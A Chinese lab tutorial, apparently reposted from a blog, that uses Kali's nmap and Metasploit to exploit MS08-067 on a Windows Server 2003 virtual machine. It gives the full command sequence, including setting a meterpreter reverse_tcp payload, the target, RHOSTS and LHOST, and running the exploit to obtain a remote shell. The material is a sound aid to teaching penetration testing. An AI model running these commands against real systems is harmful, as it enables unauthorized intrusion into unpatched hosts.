Kali第三天之Kali Linux 2020.2渗透测试Windows 2003

靶机(目标机)                IP:192.168.108.130
攻击机Kali 2020.2               IP:192.168.108.131

一:先用Kali机器的nmap工具扫描下目标机器IP再说
nmap -A 192.168.108.130   
可以看到开放了80 135 139 445 1025端口 并且操作系统Windows server 2003

/*分析下,看到有个445端口,而且是windows 2003 Server Pack2 系统, 我们知道有个著名的漏洞MS08_067 是著名的远程溢出漏洞,影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。本次实验就是metasploit利用ms08_067漏洞对win2000虚拟机进行渗透测试。MS08_067是一个在windows 445号端口上的漏洞,需要事先查看该端口是否开放,这里使用“nmap -PS 靶机ip”语句发现445号端口开放。因此可以使用MS08_067漏洞进行exploit。*/

二:利用MS08_067 漏洞渗透
1:打开神器metasploit,并搜索 ms08-067 的漏洞模块
root@kali:~# msfconsole                                   #启动metasploit
msf5 > search ms08-067                                   #搜索 ms08-067 相关漏洞模块

2.使用搜索到的模块exploit/windows/smb/ms08_067_netapi
msf5 > use exploit/windows/smb/ms08_067_netapi                      #使用 exploit/windows/smb/ms08_067_netapi 该漏洞模块

3.设置payload
msf5 exploit(windows/smb/ms08_067_netapi) > show payloads                #输入命令show payload会显示出有效的攻击载荷我们找到一个shell_reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp  #使用 windows/meterpreter/reverse_tcp 设置攻击有效载荷

4.查看被攻击的机器类型
msf5 exploit(windows/smb/ms08_067_netapi) > show targets     #show targets会显示出可以被攻击的靶机的操作系统型号

/*这里会列出很多可以被攻击的主机的类型,由于这里我们的目标机器类型是windows 2003 server sp2,那么我们使用 set target 63(选择Windows 2003 SP2 English)精确定位被攻击的目标主机系统是windows 2003 server sp2*/

5.设置被攻击的机器类型

msf5 exploit(windows/smb/ms08_067_netapi) > set target 63    #set target 63(选择Windows 2003 SP2 English)

6.设置靶机(目标机)ip
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.108.130          #设置目标机器IP

7.设置Kaili 机器的ip,set LHOST 192.168.108.131
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.108.131

8.查看需要设置的参数,show options(可以看到我们所有的设置都已经准备就绪)

 

9.开始攻击
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

猜你喜欢

转载自www.cnblogs.com/fzblog/p/12901387.html